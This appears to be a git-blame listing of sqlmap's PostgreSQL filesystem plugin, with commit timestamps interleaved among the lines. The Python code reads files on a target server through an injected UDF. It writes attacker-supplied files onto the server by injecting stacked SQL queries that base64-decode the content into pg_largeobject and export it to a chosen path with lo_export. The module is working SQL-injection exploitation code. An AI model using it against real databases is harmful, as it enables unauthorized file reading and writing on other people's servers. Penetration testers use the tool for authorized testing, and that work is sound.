2010-03-23 01:57:57 +03:00
|
|
|
#!/usr/bin/env python
|
|
|
|
|
|
|
|
"""
|
2012-07-12 21:38:03 +04:00
|
|
|
Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)
|
2010-10-15 03:18:29 +04:00
|
|
|
See the file 'doc/COPYING' for copying permission
|
2010-03-23 01:57:57 +03:00
|
|
|
"""
|
|
|
|
|
|
|
|
import os
|
|
|
|
|
|
|
|
from lib.core.common import randomInt
|
2011-04-12 02:02:00 +04:00
|
|
|
from lib.core.data import kb
|
2010-03-23 01:57:57 +03:00
|
|
|
from lib.core.data import logger
|
2012-12-06 17:14:19 +04:00
|
|
|
from lib.core.exception import SqlmapUnsupportedFeatureException
|
2010-03-23 01:57:57 +03:00
|
|
|
from lib.request import inject
|
|
|
|
from plugins.generic.filesystem import Filesystem as GenericFilesystem
|
|
|
|
|
|
|
|
class Filesystem(GenericFilesystem):
|
|
|
|
def __init__(self):
|
|
|
|
self.oid = None
|
|
|
|
|
|
|
|
GenericFilesystem.__init__(self)
|
|
|
|
|
|
|
|
def stackedReadFile(self, rFile):
|
|
|
|
infoMsg = "fetching file: '%s'" % rFile
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
|
|
self.initEnv()
|
|
|
|
|
2012-02-17 19:54:49 +04:00
|
|
|
return self.udfEvalCmd(cmd=rFile, udfName="sys_fileread")
|
2010-03-23 01:57:57 +03:00
|
|
|
|
2012-07-02 02:25:05 +04:00
|
|
|
def unionWriteFile(self, wFile, dFile, fileType):
|
2011-04-30 17:20:05 +04:00
|
|
|
errMsg = "PostgreSQL does not support file upload with UNION "
|
2010-03-23 01:57:57 +03:00
|
|
|
errMsg += "query SQL injection technique"
|
2012-12-06 17:14:19 +04:00
|
|
|
raise SqlmapUnsupportedFeatureException, errMsg
|
2010-03-23 01:57:57 +03:00
|
|
|
|
2012-07-02 02:25:05 +04:00
|
|
|
def stackedWriteFile(self, wFile, dFile, fileType):
|
2010-03-23 01:57:57 +03:00
|
|
|
wFileSize = os.path.getsize(wFile)
|
|
|
|
|
|
|
|
if wFileSize > 8192:
|
2011-04-30 17:20:05 +04:00
|
|
|
errMsg = "on PostgreSQL it is not possible to write files "
|
2010-03-23 01:57:57 +03:00
|
|
|
errMsg += "bigger than 8192 bytes at the moment"
|
2012-12-06 17:14:19 +04:00
|
|
|
raise SqlmapUnsupportedFeatureException, errMsg
|
2010-03-23 01:57:57 +03:00
|
|
|
|
|
|
|
self.oid = randomInt()
|
|
|
|
|
2011-04-30 17:20:05 +04:00
|
|
|
debugMsg = "creating a support table to write the base64 "
|
2010-03-23 01:57:57 +03:00
|
|
|
debugMsg += "encoded file to"
|
|
|
|
logger.debug(debugMsg)
|
|
|
|
|
|
|
|
self.createSupportTbl(self.fileTblName, self.tblField, "text")
|
|
|
|
|
|
|
|
logger.debug("encoding file to its base64 string value")
|
|
|
|
fcEncodedList = self.fileEncode(wFile, "base64", False)
|
|
|
|
|
2011-04-30 17:20:05 +04:00
|
|
|
debugMsg = "forging SQL statements to write the base64 "
|
2010-03-23 01:57:57 +03:00
|
|
|
debugMsg += "encoded file to the support table"
|
|
|
|
logger.debug(debugMsg)
|
|
|
|
|
|
|
|
sqlQueries = self.fileToSqlQueries(fcEncodedList)
|
|
|
|
|
|
|
|
logger.debug("inserting the base64 encoded file to the support table")
|
|
|
|
|
|
|
|
for sqlQuery in sqlQueries:
|
|
|
|
inject.goStacked(sqlQuery)
|
|
|
|
|
2011-04-30 17:20:05 +04:00
|
|
|
debugMsg = "create a new OID for a large object, it implicitly "
|
2010-03-23 01:57:57 +03:00
|
|
|
debugMsg += "adds an entry in the large objects system table"
|
|
|
|
logger.debug(debugMsg)
|
|
|
|
|
|
|
|
# References:
|
|
|
|
# http://www.postgresql.org/docs/8.3/interactive/largeobjects.html
|
|
|
|
# http://www.postgresql.org/docs/8.3/interactive/lo-funcs.html
|
|
|
|
inject.goStacked("SELECT lo_unlink(%d)" % self.oid)
|
|
|
|
inject.goStacked("SELECT lo_create(%d)" % self.oid)
|
|
|
|
|
2011-04-30 17:20:05 +04:00
|
|
|
debugMsg = "updating the system large objects table assigning to "
|
2010-03-23 01:57:57 +03:00
|
|
|
debugMsg += "the just created OID the binary (base64 decoded) UDF "
|
|
|
|
debugMsg += "as data"
|
|
|
|
logger.debug(debugMsg)
|
|
|
|
|
|
|
|
# Refereces:
|
|
|
|
# * http://www.postgresql.org/docs/8.3/interactive/catalog-pg-largeobject.html
|
|
|
|
# * http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql
|
|
|
|
#
|
|
|
|
# NOTE: From PostgreSQL site:
|
|
|
|
#
|
|
|
|
# "The data stored in the large object will never be more than
|
|
|
|
# LOBLKSIZE bytes and might be less which is BLCKSZ/4, or
|
|
|
|
# typically 2 Kb"
|
|
|
|
#
|
|
|
|
# As a matter of facts it was possible to store correctly a file
|
|
|
|
# large 13776 bytes, the problem arises at next step (lo_export())
|
2011-04-12 02:02:00 +04:00
|
|
|
#
|
|
|
|
# Inject manually into PostgreSQL system table pg_largeobject the
|
|
|
|
# base64-decoded file content. Note that PostgreSQL >= 9.0 does
|
|
|
|
# not accept UPDATE into that table for some reason.
|
|
|
|
self.getVersionFromBanner()
|
|
|
|
banVer = kb.bannerFp["dbmsVersion"]
|
|
|
|
|
|
|
|
if banVer >= "9.0":
|
|
|
|
inject.goStacked("INSERT INTO pg_largeobject VALUES (%d, 0, DECODE((SELECT %s FROM %s), 'base64'))" % (self.oid, self.tblField, self.fileTblName))
|
|
|
|
else:
|
|
|
|
inject.goStacked("UPDATE pg_largeobject SET data=(DECODE((SELECT %s FROM %s), 'base64')) WHERE loid=%d" % (self.tblField, self.fileTblName, self.oid))
|
2010-03-23 01:57:57 +03:00
|
|
|
|
2011-04-30 17:20:05 +04:00
|
|
|
debugMsg = "exporting the OID %s file content to " % fileType
|
2010-03-23 01:57:57 +03:00
|
|
|
debugMsg += "file '%s'" % dFile
|
|
|
|
logger.debug(debugMsg)
|
|
|
|
|
|
|
|
# NOTE: lo_export() exports up to only 8192 bytes of the file
|
|
|
|
# (pg_largeobject 'data' field)
|
|
|
|
inject.goStacked("SELECT lo_export(%d, '%s')" % (self.oid, dFile), silent=True)
|
|
|
|
|
2012-07-02 02:25:05 +04:00
|
|
|
self.askCheckWrittenFile(wFile, dFile, fileType)
|
2010-03-23 01:57:57 +03:00
|
|
|
|
2010-03-27 02:23:25 +03:00
|
|
|
inject.goStacked("SELECT lo_unlink(%d)" % self.oid)
|